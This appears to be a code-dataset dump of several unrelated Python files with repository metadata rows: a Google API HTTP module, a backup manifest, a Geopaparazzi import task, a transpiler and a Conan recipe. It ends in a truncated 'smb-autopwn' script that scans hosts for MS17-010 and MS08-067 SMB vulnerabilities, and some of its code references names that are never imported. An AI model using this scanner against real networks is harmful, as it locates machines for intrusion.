The body will be None until the resumable media is fully uploaded.
"""
if http is None:
http = self.http
if self.resumable_uri is None:
start_headers = copy.copy(self.headers)
start_headers['X-Upload-Content-Type'] = self.resumable.mimetype()
start_headers['X-Upload-Content-Length'] = str(self.resumable.size())
start_headers['Content-Length'] = '0'
resp, content = http.request(self.uri, self.method,
body="",
headers=start_headers)
if resp.status == 200 and 'location' in resp:
self.resumable_uri = resp['location']
else:
raise ResumableUploadError("Failed to retrieve starting URI.")
if self.body:
begin = 0
data = self.body
else:
begin = self.resumable_progress - self.multipart_size
data = self.resumable.getbytes(begin, self.resumable.chunksize())
# Tack on the multipart/related boundary if we are at the end of the file.
if begin + self.resumable.chunksize() >= self.resumable.size():
data += self.multipart_boundary
headers = {
'Content-Range': 'bytes %d-%d/%d' % (
self.resumable_progress, self.resumable_progress + len(data) - 1,
self.total_size),
}
resp, content = http.request(self.resumable_uri, 'PUT',
body=data,
headers=headers)
if resp.status in [200, 201]:
return None, self.postproc(resp, content)
# A "308 Resume Incomplete" indicates we are not done.
elif resp.status == 308:
self.resumable_progress = int(resp['range'].split('-')[1]) + 1
if self.resumable_progress >= self.multipart_size:
self.body = None
if 'location' in resp:
self.resumable_uri = resp['location']
else:
raise HttpError(resp, content, self.uri)
return MediaUploadProgress(self.resumable_progress, self.total_size), None
def to_json(self):
"""Returns a JSON representation of the HttpRequest."""
d = copy.copy(self.__dict__)
if d['resumable'] is not None:
d['resumable'] = self.resumable.to_json()
del d['http']
del d['postproc']
return simplejson.dumps(d)
@staticmethod
def from_json(s, http, postproc):
"""Returns an HttpRequest populated with info from a JSON object."""
d = simplejson.loads(s)
if d['resumable'] is not None:
d['resumable'] = MediaUpload.new_from_json(d['resumable'])
return HttpRequest(
http,
postproc,
uri = d['uri'],
method= d['method'],
body=d['body'],
headers=d['headers'],
methodId=d['methodId'],
resumable=d['resumable'])
class HttpRequestMock(object):
"""Mock of HttpRequest.
Do not construct directly, instead use RequestMockBuilder.
"""
def __init__(self, resp, content, postproc):
"""Constructor for HttpRequestMock
Args:
resp: httplib2.Response, the response to emulate coming from the request
content: string, the response body
postproc: callable, the post processing function usually supplied by
the model class. See model.JsonModel.response() as an example.
"""
self.resp = resp
self.content = content
self.postproc = postproc
if resp is None:
self.resp = httplib2.Response({'status': 200, 'reason': 'OK'})
if 'reason' in self.resp:
self.resp.reason = self.resp['reason']
def execute(self, http=None):
"""Execute the request.
Same behavior as HttpRequest.execute(), but the response is
mocked and not really from an HTTP request/response.
"""
return self.postproc(self.resp, self.content)
class RequestMockBuilder(object):
"""A simple mock of HttpRequest
Pass in a dictionary to the constructor that maps request methodIds to
tuples of (httplib2.Response, content, opt_expected_body) that should be
returned when that method is called. None may also be passed in for the
httplib2.Response, in which case a 200 OK response will be generated.
If an opt_expected_body (str or dict) is provided, it will be compared to
the body and UnexpectedBodyError will be raised on inequality.
Example:
response = '{"data": {"id": "tag:google.c...'
requestBuilder = RequestMockBuilder(
{
'plus.activities.get': (None, response),
}
)
apiclient.discovery.build("plus", "v1", requestBuilder=requestBuilder)
Methods that you do not supply a response for will return a
200 OK with an empty string as the response content or raise an excpetion if
check_unexpected is set to True. The methodId is taken from the rpcName
in the discovery document.
For more details see the project wiki.
"""
def __init__(self, responses, check_unexpected=False):
"""Constructor for RequestMockBuilder
The constructed object should be a callable object
that can replace the class HttpResponse.
responses - A dictionary that maps methodIds into tuples
of (httplib2.Response, content). The methodId
comes from the 'rpcName' field in the discovery
document.
check_unexpected - A boolean setting whether or not UnexpectedMethodError
should be raised on unsupplied method.
"""
self.responses = responses
self.check_unexpected = check_unexpected
def __call__(self, http, postproc, uri, method='GET', body=None,
headers=None, methodId=None, resumable=None):
"""Implements the callable interface that discovery.build() expects
of requestBuilder, which is to build an object compatible with
HttpRequest.execute(). See that method for the description of the
parameters and the expected response.
"""
if methodId in self.responses:
response = self.responses[methodId]
resp, content = response[:2]
if len(response) > 2:
# Test the body against the supplied expected_body.
expected_body = response[2]
if bool(expected_body) != bool(body):
# Not expecting a body and provided one
# or expecting a body and not provided one.
raise UnexpectedBodyError(expected_body, body)
if isinstance(expected_body, str):
expected_body = simplejson.loads(expected_body)
body = simplejson.loads(body)
if body != expected_body:
raise UnexpectedBodyError(expected_body, body)
return HttpRequestMock(resp, content, postproc)
elif self.check_unexpected:
raise UnexpectedMethodError(methodId)
else:
model = JsonModel(False)
return HttpRequestMock(None, '{}', model.response)
class HttpMock(object):
"""Mock of httplib2.Http"""
def __init__(self, filename, headers=None):
"""
Args:
filename: string, absolute filename to read response from
headers: dict, header to return with response
"""
if headers is None:
headers = {'status': '200 OK'}
f = file(filename, 'r')
self.data = f.read()
f.close()
self.headers = headers
def request(self, uri,
method='GET',
body=None,
headers=None,
redirections=1,
connection_type=None):
return httplib2.Response(self.headers), self.data
class HttpMockSequence(object):
"""Mock of httplib2.Http
Mocks a sequence of calls to request returning different responses for each
call. Create an instance initialized with the desired response headers
and content and then use as if an httplib2.Http instance.
http = HttpMockSequence([
({'status': '401'}, ''),
({'status': '200'}, '{"access_token":"1/3w","expires_in":3600}'),
({'status': '200'}, 'echo_request_headers'),
])
resp, content = http.request("http://examples.com")
There are special values you can pass in for content to trigger
behavours that are helpful in testing.
'echo_request_headers' means return the request headers in the response body
'echo_request_headers_as_json' means return the request headers in
the response body
'echo_request_body' means return the request body in the response body
'echo_request_uri' means return the request uri in the response body
"""
def __init__(self, iterable):
"""
Args:
iterable: iterable, a sequence of pairs of (headers, body)
"""
self._iterable = iterable
def request(self, uri,
method='GET',
body=None,
headers=None,
redirections=1,
connection_type=None):
resp, content = self._iterable.pop(0)
if content == 'echo_request_headers':
content = headers
elif content == 'echo_request_headers_as_json':
content = simplejson.dumps(headers)
elif content == 'echo_request_body':
content = body
elif content == 'echo_request_uri':
content = uri
return httplib2.Response(resp), content
def set_user_agent(http, user_agent):
"""Set the user-agent on every request.
Args:
http - An instance of httplib2.Http
or something that acts like it.
user_agent: string, the value for the user-agent header.
Returns:
A modified instance of http that was passed in.
Example:
h = httplib2.Http()
h = set_user_agent(h, "my-app-name/6.0")
Most of the time the user-agent will be set doing auth, this is for the rare
cases where you are accessing an unauthenticated endpoint.
"""
request_orig = http.request
# The closure that will replace 'httplib2.Http.request'.
def new_request(uri, method='GET', body=None, headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS,
connection_type=None):
"""Modify the request headers to add the user-agent."""
if headers is None:
headers = {}
if 'user-agent' in headers:
headers['user-agent'] = user_agent + ' ' + headers['user-agent']
else:
headers['user-agent'] = user_agent
resp, content = request_orig(uri, method, body, headers,
redirections, connection_type)
return resp, content
http.request = new_request
return http
def tunnel_patch(http):
"""Tunnel PATCH requests over POST.
Args:
http - An instance of httplib2.Http
or something that acts like it.
Returns:
A modified instance of http that was passed in.
Example:
h = httplib2.Http()
h = tunnel_patch(h, "my-app-name/6.0")
Useful if you are running on a platform that doesn't support PATCH.
Apply this last if you are using OAuth 1.0, as changing the method
will result in a different signature.
"""
request_orig = http.request
# The closure that will replace 'httplib2.Http.request'.
def new_request(uri, method='GET', body=None, headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS,
connection_type=None):
"""Modify the request headers to add the user-agent."""
if headers is None:
headers = {}
if method == 'PATCH':
if 'oauth_token' in headers.get('authorization', ''):
logging.warning(
'OAuth 1.0 request made with Credentials after tunnel_patch.')
headers['x-http-method-override'] = "PATCH"
method = 'POST'
resp, content = request_orig(uri, method, body, headers,
redirections, connection_type)
return resp, content
http.request = new_request
return http
| 32.116923 | 98 | 0.65822 | 2,660 | 20,876 | 5.076692 | 0.185714 | 0.025992 | 0.015551 | 0.010886 | 0.238004 | 0.190684 | 0.17854 | 0.168395 | 0.158027 | 0.151659 | 0 | 0.007538 | 0.250144 | 20,876 | 649 | 99 | 32.16641 | 0.855117 | 0.456553 | 0 | 0.3 | 0 | 0 | 0.075364 | 0.013227 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12069 | false | 0 | 0.041379 | 0.024138 | 0.286207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4624156d72b09ac88f02395c6089a4280577f0 | 7,924 | py | Python | src/backuper/manifest.py | EduardoLemos567/PyBackuper | c339ffbb25690597e64bcfce5347d8d6e9dc27f0 | [
"MIT"
] | null | null | null | src/backuper/manifest.py | EduardoLemos567/PyBackuper | c339ffbb25690597e64bcfce5347d8d6e9dc27f0 | [
"MIT"
] | null | null | null | src/backuper/manifest.py | EduardoLemos567/PyBackuper | c339ffbb25690597e64bcfce5347d8d6e9dc27f0 | [
"MIT"
] | null | null | null | """
:license:
license is described in the LICENSE file provided.
A copy can be accessed in: https://github.com/EduardoLemos567/PyBackuper/blob/master/LICENSE
:author:
Eduardo Lemos de Moraes
"""
import collections
from . import foldernode
class Manifest:
"""
Class to keep the folder structure and files paths and signatures.
Also keep the timestamp for future sync compares.
"""
def __init__(self):
self.timestamp = None # float
self.root = foldernode.FolderNode(":root:")
def __eq__(self, other):
"""
:param other Manifest: other manifest to compare to.
:return bool: False if any 'self' manifest's folder or file doesnt exist on 'other' manifest.
Or in case of files, the signature doesnt match.
"""
if type(other) is not Manifest:
return False
queue = collections.deque([(self.root, other.root)])
while len(queue) > 0:
self_folder, other_folder = queue.popleft()
# if any name is missing or is different
if self_folder._children.keys() ^ other_folder._children.keys():
return False
# we know both side got the same names in keys
for self_node_instance in self_folder._children.values():
other_node_instance = other_folder[self_node_instance.name]
# if both names points to the same type of object
if type(self_node_instance) == type(other_node_instance):
if type(self_node_instance) is foldernode.FolderNode:
# case its a folder, add for the next cycle
queue.append(
(self_node_instance, other_folder[self_node_instance.name])
)
# case its a file, check signature
elif self_node_instance.signature != other_node_instance.signature:
return False
else:
return False
return True
def diff_nodes(self, other, include_files=True, include_folders=True):
"""
:param other Manifest: other manifest to compare nodes of.
:param include_files bool: should return FileNodes
:param include_folders bool: should return FolderNodes
:return generator(Node): (files/folders) existing on 'self' manifest
but without corresponding copy on 'other' manifest.
"""
if (not include_files) and (not include_folders):
return
# iterate all 'self' folders from 'root'
for folder_node in self.iterate(include_files=False):
# try to find a corresponding folder on 'other'
result = other.find_child(folder_node.get_parts())
if result is None:
# if not found, all 'self' folder's content are unique, include on the results
for value in folder_node.get_children():
if type(value) is foldernode.FolderNode:
if include_folders:
yield value
elif include_files:
yield value
else:
for value in folder_node.diff_nodes(
result, include_files, include_folders
):
yield value
def get_signatures_set(self):
"""
:return set(str): Return a set (each set member is unique, no copies) of all signatures
for all files existing on this manifest.
"""
s = set()
for file_node in self.iterate(include_folders=False):
s.add(file_node.signature)
return s
def get_signatures_dict(self, limit=None):
"""
Method to group all FileNode under its signatures, making it easy to test and find those.
:param limit int|None: You can set a limit to the lists, None = no limit. If you set
limit==1 instead of a list, the values are just single FileNodes (the first one found)
:return dict(key:str, value:list(FileNode)): A dict grouping all files by its signature.
Key are the signature and values is a list of all FileNode with that signature (but in case
of limit==1 we get single FileNodes instead of lists).
"""
d = dict()
for file_node in self.iterate(include_folders=False):
if file_node.signature in d:
if limit is None or len(d[file_node.signature]) < limit:
d[file_node.signature].append(file_node)
else:
if limit is None or limit > 1:
d[file_node.signature] = [file_node]
else:
d[file_node.signature] = file_node
return d
def iterate(self, include_files=True, include_folders=True):
"""
Do a iteration returning a generator, including all nodes by given parameters.
Can include: only files, only folders or both.
:param include_files bool: should return FileNodes
:param include_folders bool: should return FolderNodes
:return generator(Node): Generator object that yields Nodes doing a deep listing of children.
"""
if (not include_files) and (not include_folders):
return
queue = collections.deque([self.root])
while len(queue) > 0:
folder = queue.popleft()
if include_folders:
yield folder
# NOTE: why we use here get_children()?
# So we have a frozen set, ignoring outside changes.
for node_instance in folder.get_children():
if type(node_instance) is foldernode.FolderNode:
queue.append(node_instance) # yield on the next cycle
elif include_files:
yield node_instance
def find_child(self, parts, ensure_folder_exists=False):
"""
Find the correct child following the parts sequence,
doing a deep search on the "folder" children nodes.
(Always start looking on the self.root folder)
:param parts sequence: any sequence object to look for parts.
:param ensure_folder_exists bool: If any part of the parts doesnt exist,
we create them and assume the whole path point to a folders.
(Meaning you should not use it for file paths)
:return Node: the Node pointing to that path, in case of ensure_folder_exists and
path doesnt exist, we create it as a path of folders.
Can return None if ensure_folder_exists is False and the path doesnt not exist.
"""
created = False # its a flag to indicate we should stop lookin and from now on create folders
folder = self.root
for name in parts:
if not created:
if name in folder:
folder = folder[name]
elif ensure_folder_exists:
created = True
else:
return None
if created:
folder = foldernode.FolderNode(name, folder)
return folder
def print_debug(self):
"""
Method to print the whole manifest in a human readable way.
"""
print("Manifest:\n")
print(
"Folders:\n{}\n".format(
"\n".join(
[
folder_node.get_path_str()
for folder_node in self.iterate(include_files=False)
]
)
)
)
print(
"Files:\n{}\n".format(
"\n".join(
[
file_node.get_path_str()
for file_node in self.iterate(include_folders=False)
]
)
)
)
| 42.148936 | 102 | 0.576855 | 953 | 7,924 | 4.679958 | 0.228751 | 0.037668 | 0.025112 | 0.019058 | 0.25 | 0.179596 | 0.152691 | 0.134753 | 0.115471 | 0.047982 | 0 | 0.00157 | 0.357143 | 7,924 | 187 | 103 | 42.374332 | 0.873969 | 0.37683 | 0 | 0.256881 | 0 | 0 | 0.010357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073395 | false | 0 | 0.018349 | 0 | 0.201835 | 0.036697 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b48ca5dfa86aee634ad96662cb5b88fe16fda6e | 6,306 | py | Python | profiles/tasks.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | null | null | null | profiles/tasks.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | null | null | null | profiles/tasks.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | null | null | null | # Create your tasks here
from __future__ import absolute_import, unicode_literals
import os
from datetime import datetime, timezone
# from celery import shared_task
from geotabloid.taskapp.celery import app
import sqlite3
import tempfile
from PIL import Image, ExifTags
from django.contrib.auth import get_user_model
from gp_projects.models import ImageNote, Note, TrackFeature
from django.contrib.gis.geos import Point, LineString
from django.core.files import File
from django.core.files.storage import default_storage
@app.task
def LoadUserProject(userproject_file, ownerid):
""" given an uploaded Geopaparazzi UserProject
extract the useful bits and load them to the database
:param userproject_file: name of the sqlite3 file to be read
:param ownerid: id of the file owner
:type arg1: string
:type arg2: int
:rtype: None
Since the userproject file and the images extracted from it may be managed by the Django-storages module (Boto)
we have to take care to make local copies of all files accessed.
Also, since this task is intended for asynchronous execution via Celery, the calling parameters cannot be
model instances (they are not JSON serializable!), so any model references have to be passed using primary keys
"""
# before we can open the database file, it must be copied locally!
document = default_storage.open(userproject_file, 'rb')
userproject = tempfile.NamedTemporaryFile(delete=False)
# this might be a memory problem!
data = document.read()
userproject.write(data)
userproject.close()
# get the owner from the ownerid
User = get_user_model()
owner = User.objects.get(id=ownerid)
# connect to the database
conn = sqlite3.connect(userproject.name)
conn.row_factory = sqlite3.Row
c = conn.cursor()
# import gpstracks if any
for gpslog in c.execute('SELECT * FROM gpslogs;'):
log_dict = dict(gpslog)
rcd = TrackFeature(owner=owner, text=log_dict['text'])
rcd.timestamp_start = datetime.utcfromtimestamp(log_dict['startts']/1000).replace(tzinfo=timezone.utc)
rcd.timestamp_end = datetime.utcfromtimestamp(log_dict['endts']/1000).replace(tzinfo=timezone.utc)
rcd.lengthm = log_dict['lengthm']
d = conn.cursor()
plist = []
for pt in d.execute('SELECT * FROM gpslogsdata WHERE logid=? ORDER BY ts ASC', (log_dict['_id'],)):
pt_dict = dict(pt)
plist.append(Point(pt_dict['lon'], pt_dict['lat']))
rcd.linestring = LineString(plist)
rcd.save()
d.close()
# import notes and images together in order to preserve relationships
for nt in c.execute('SELECT * FROM notes;'):
nt_dict = dict(nt)
rcd = Note(owner=owner, text= nt_dict['text'], form = nt_dict['form'])
rcd.timestamp = datetime.utcfromtimestamp(nt_dict['ts']/1000).replace(tzinfo=timezone.utc)
rcd.description = nt_dict['description']
rcd.lat = nt_dict['lat']
rcd.lon = nt_dict['lon']
rcd.location = Point(rcd.lon, rcd.lat)
rcd.altitude = nt_dict['altim']
rcd.save() # save the Note here so that we can refer to it when creating ImageNote records
d = conn.cursor()
# Import all Images linked to the current Note
# Design Note: presumes ImageNote records are _always_ referenced by a Note
# unreferenced records will not be imported
for im in d.execute('SELECT * FROM images WHERE note_id=?;', (nt_dict['_id'],)):
im_dict = dict(im)
imgrcd = ImageNote(owner=owner, note=rcd, azimuth=im_dict['azim'])
# Note that ImageNote records have time and location distinct from the Note
imgrcd.timestamp = datetime.utcfromtimestamp(im_dict['ts']/1000).replace(tzinfo=timezone.utc)
imgrcd.lat = im_dict['lat']
imgrcd.lon = im_dict['lon']
imgrcd.location = Point(imgrcd.lon, imgrcd.lat)
imgrcd.altitude = im_dict['altim']
e = conn.cursor()
e.execute('SELECT * FROM imagedata WHERE _id=?;', (im_dict['_id'],))
img = e.fetchone()
img_dict = dict(img)
# save the full image locally - this should probably be put in a temp directory
blob = img_dict['data']
local_filename = im_dict['text']
with open(local_filename, 'wb') as output_file:
output_file.write(blob)
# Rotate the image if an orientation tag is available
try:
image = Image.open(local_filename)
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
exif = dict(image._getexif().items())
if exif[orientation] == 3:
image = image.rotate(180, expand=True)
elif exif[orientation] == 6:
image = image.rotate(270, expand=True)
elif exif[orientation] == 8:
image = image.rotate(90, expand=True)
image.save(local_filename)
image.close()
except (AttributeError, KeyError, IndexError):
# cases: image don't have getexif
pass
qf = open(local_filename, 'rb')
imgrcd.image = File(qf)
# the thumbnail - also should be placed in a temp directory
blob = img_dict['thumbnail']
thmname = 'thm_{0}'.format(local_filename)
with open(thmname, 'wb') as output_file:
output_file.write(blob)
qt = open(thmname, 'rb')
imgrcd.thumbnail = File(qt)
# save the newly created image record
imgrcd.save()
# clean up temporary image files
qf.close()
try:
os.remove(local_filename)
except OSError as err:
pass
qt.close()
try:
os.remove(thmname)
except OSError as err:
pass
# clean up the temporary sqlite3 file
userproject.close()
try:
os.remove(userproject.name)
except OSError as err:
pass
| 41.486842 | 115 | 0.621154 | 786 | 6,306 | 4.895674 | 0.342239 | 0.014033 | 0.022089 | 0.025988 | 0.118763 | 0.065748 | 0.048857 | 0.017152 | 0 | 0 | 0 | 0.007799 | 0.288297 | 6,306 | 151 | 116 | 41.761589 | 0.849599 | 0.251982 | 0 | 0.180952 | 0 | 0 | 0.065016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009524 | false | 0.038095 | 0.114286 | 0 | 0.12381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4965ed011d284f6111fffd9796620883222efb | 1,763 | py | Python | transpiler/flex_transpiler.py | thegenuinegourav/transpiler-wit | 021ce6f423a0a372761d5a3440327bf96140592f | [
"MIT"
] | null | null | null | transpiler/flex_transpiler.py | thegenuinegourav/transpiler-wit | 021ce6f423a0a372761d5a3440327bf96140592f | [
"MIT"
] | null | null | null | transpiler/flex_transpiler.py | thegenuinegourav/transpiler-wit | 021ce6f423a0a372761d5a3440327bf96140592f | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
'''
The Flex Transpiler.
Usage:
flex_transpiler <source> -l <lang> [-o <output>]
flex_transpiler -h
Arguments:
<source> Path to the input Flex source file.
Options:
-l <lang>, --target-language <lang> The target language to transpile to.
-o <output>, --output <output> Path to the generated output file.
-h, --help Print this help text.
Target languages available:
python
'''
from os import environ
from docopt import docopt
import requests
API_URL = 'https://api.wit.ai/message?v=22/02/2018'
def generate_code(response, language):
intent = response['entities']['intent'][0]['value']
if language == 'python':
from languages.python import code
elif language == 'c++':
from languages.c_plus_plus import code
kwargs = {}
for entity in code[intent]['entities']:
kwargs[entity] = response['entities'][entity][0]['value']
return code[intent]['code'].format_map(kwargs)
if __name__ == '__main__':
args = docopt(__doc__)
source_file_path = args['<source>']
target_language = args['--target-language']
output_file_path = args['--output']
headers = { 'Authorization': 'Bearer ' + environ['WIT_AUTH'] }
code = []
with open(source_file_path, 'r') as source:
source_lines = source.readlines()
for line in source_lines:
if not line.isspace(): # line is not "blank"
params = { 'q': line }
response = requests.get(API_URL, params=params, headers=headers).json()
code.append(generate_code(response=response, language=target_language))
with open(output_file_path, 'w') as output:
output.writelines(code)
| 27.984127 | 87 | 0.627907 | 216 | 1,763 | 4.967593 | 0.425926 | 0.065238 | 0.016775 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008215 | 0.240499 | 1,763 | 62 | 88 | 28.435484 | 0.793129 | 0.266024 | 0 | 0 | 0 | 0 | 0.127626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.166667 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4dc36d98d66803421d0547a2966e1f1f05b769 | 3,204 | py | Python | recipes/termcap/all/conanfile.py | flexferrum/conan-center-index | 5d0fb36e1e0b757e6deebc330c34d07dc1a5a7a5 | [
"MIT"
] | 3 | 2020-04-16T15:01:33.000Z | 2022-01-13T08:05:47.000Z | recipes/termcap/all/conanfile.py | flexferrum/conan-center-index | 5d0fb36e1e0b757e6deebc330c34d07dc1a5a7a5 | [
"MIT"
] | 33 | 2020-02-18T15:54:50.000Z | 2022-03-28T08:54:10.000Z | recipes/termcap/all/conanfile.py | GavinNL/conan-center-index | 0ae829a362c1cc6a20d97e023ca0aafc805797c3 | [
"MIT"
] | 8 | 2020-03-06T14:38:18.000Z | 2022-03-28T08:41:15.000Z | import os
from conans import ConanFile, CMake, tools
import re
import shutil
class TermcapConan(ConanFile):
name = "termcap"
homepage = "https://www.gnu.org/software/termcap"
url = "https://github.com/conan-io/conan-center-index"
description = "Enables programs to use display terminals in a terminal-independent manner"
license = "GPL-2.0"
topics = ("conan", "termcap", "terminal", "display")
exports_sources = ["CMakeLists.txt", "patches/*"]
generators = "cmake"
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [True, False], "fPIC": [True, False], }
default_options = {"shared": False, "fPIC": True, }
@property
def _source_subfolder(self):
return "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def source(self):
archive_name = self.name + "-" + self.version
tools.get(**self.conan_data["sources"][self.version])
os.rename(archive_name, self._source_subfolder)
def _extract_sources(self):
makefile_text = open(os.path.join(self._source_subfolder, "Makefile.in")).read()
sources = list("{}/{}".format(self._source_subfolder, src) for src in re.search("\nSRCS = (.*)\n", makefile_text).group(1).strip().split(" "))
headers = list("{}/{}".format(self._source_subfolder, src) for src in re.search("\nHDRS = (.*)\n", makefile_text).group(1).strip().split(" "))
autoconf_text = open(os.path.join(self._source_subfolder, "configure.in")).read()
optional_headers = re.search(r"AC_HAVE_HEADERS\((.*)\)", autoconf_text).group(1).strip().split(" ")
return sources, headers, optional_headers
def _configure_cmake(self):
cmake = CMake(self)
sources, headers, optional_headers = self._extract_sources()
cmake.definitions["TERMCAP_SOURCES"] = ";".join(sources)
cmake.definitions["TERMCAP_HEADERS"] = ";".join(headers)
cmake.definitions["TERMCAP_INC_OPTS"] = ";".join(optional_headers)
cmake.verbose=True
cmake.parallel = False
cmake.configure()
return cmake
def _patch_sources(self):
for patch in self.conan_data["patches"][self.version]:
tools.patch(**patch)
for src in self._extract_sources()[0]:
txt = open(src).read()
with open(src, "w") as f:
f.write("#include \"termcap_intern.h\"\n\n")
f.write(txt)
def build(self):
self._patch_sources()
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy(pattern="COPYING", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.names["cmake_find_package"] = "Termcap"
self.cpp_info.names["cmake_find_package_multi"] = "Termcap"
self.cpp_info.libs = tools.collect_libs(self)
if self.options.shared:
self.cpp_info.definitions = ["TERMCAP_SHARED"]
| 39.555556 | 150 | 0.634207 | 383 | 3,204 | 5.130548 | 0.342037 | 0.061069 | 0.058015 | 0.022901 | 0.187277 | 0.148601 | 0.148601 | 0.086514 | 0.048855 | 0.048855 | 0 | 0.002388 | 0.215668 | 3,204 | 80 | 151 | 40.05 | 0.779546 | 0 | 0 | 0.029412 | 0 | 0 | 0.1701 | 0.014669 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147059 | false | 0 | 0.058824 | 0.014706 | 0.426471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4ec54b5d195dc5f3df6daf6145850eb3ea00a2 | 7,935 | py | Python | smb-autopwn.py | DanMcInerney/smb-autopwn | fb110143f86e90ea3519b1701c697c8c503b0f4b | [
"MIT"
] | 50 | 2018-03-02T00:48:01.000Z | 2021-09-26T16:36:43.000Z | smb-autopwn.py | MrHacker46/smb-autopwn | fb110143f86e90ea3519b1701c697c8c503b0f4b | [
"MIT"
] | null | null | null | smb-autopwn.py | MrHacker46/smb-autopwn | fb110143f86e90ea3519b1701c697c8c503b0f4b | [
"MIT"
] | 23 | 2018-03-02T00:48:02.000Z | 2021-08-23T19:37:34.000Z | #!/usr/bin/env python
import os
from subprocess import Popen, PIPE, CalledProcessError
import sys
from libnmap.process import NmapProcess
from libnmap.parser import NmapParser, NmapParserException
import netifaces
import argparse
from termcolor import colored
import time
def parse_args():
# Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--hostlist", help="Host list file")
return parser.parse_args()
# Colored terminal output
def print_bad(msg):
print(colored('[-] ', 'red') + msg)
def print_info(msg):
print(colored('[*] ', 'blue') + msg)
def print_good(msg):
print(colored('[+] ', 'green') + msg)
def print_great(msg):
print(colored('[!] {}'.format(msg), 'yellow', attrs=['bold']))
def parse_nmap(args):
'''
Either performs an Nmap scan or parses an Nmap xml file
Will either return the parsed report or exit script
'''
if args.hostlist:
hosts = []
with open(args.hostlist, 'r') as hostlist:
host_lines = hostlist.readlines()
for line in host_lines:
line = line.strip()
try:
if '/' in line:
hosts += [str(ip) for ip in IPNetwork(line)]
elif '*' in line:
print_bad('CIDR notation only in the host list, e.g. 10.0.0.0/24')
sys.exit()
else:
hosts.append(line)
except (OSError, AddrFormatError):
print_bad('Error importing host list file. Are you sure you chose the right file?')
sys.exit()
report = nmap_scan(hosts)
return report
def nmap_status_printer(nmap_proc):
'''
Prints that Nmap is running
'''
i = -1
x = -.5
while nmap_proc.is_running():
i += 1
# Every 30 seconds print that Nmap is still running
if i % 30 == 0:
x += .5
print_info("Nmap running: {} min".format(str(x)))
time.sleep(1)
def run_proc(cmd):
'''
Runs single commands
ntlmrelayx needs the -c "powershell ... ..." cmd to be one arg tho
'''
cmd_split = cmd.split()
print_info('Running: {}'.format(cmd))
proc = Popen(cmd_split, stdout=STDOUT, stderr=STDOUT)
return proc
def run_proc_xterm(cmd):
'''
Runs a process in an xterm window that doesn't die with icebreaker.py
'''
xterm_cmd = 'nohup xterm -hold -e {}'
full_cmd = xterm_cmd.format(cmd)
print_info('Running: {}'.format(full_cmd))
# Split it only on xterm args, leave system command in 1 string
cmd_split = full_cmd.split(' ', 4)
# preexec_fn allows the xterm window to stay alive after closing script
proc = Popen(cmd_split, stdout=PIPE, stderr=PIPE, preexec_fn=os.setpgrp)
return proc
def nmap_scan(hosts):
'''
Do Nmap scan
'''
nmap_args = '-sS -T4 --script smb-vuln-ms17-010,smb-vuln-ms08-067 -n --max-retries 5 -p 445 -oA smb-scan'
nmap_proc = NmapProcess(targets=hosts, options=nmap_args, safe_mode=False)
rc = nmap_proc.sudo_run_background()
nmap_status_printer(nmap_proc)
report = NmapParser.parse_fromfile(os.getcwd()+'/smb-scan.xml')
return report
def get_hosts(args, report):
'''
Gets list of hosts with port 445 or 3268 (to find the DC) open
and a list of hosts with smb signing disabled
'''
hosts = []
print_info('Parsing hosts')
for host in report.hosts:
if host.is_up():
# Get open services
for s in host.services:
if s.port == 445:
if s.state == 'open':
hosts.append(host)
if len(hosts) == 0:
print_bad('No hosts with port 445 open')
sys.exit()
return hosts
def get_vuln_hosts(hosts):
'''
Parse NSE scripts to find vulnerable hosts
'''
vuln_hosts = {}
nse_scripts = ['smb-vuln-ms17-010', 'smb-vuln-ms08-067']
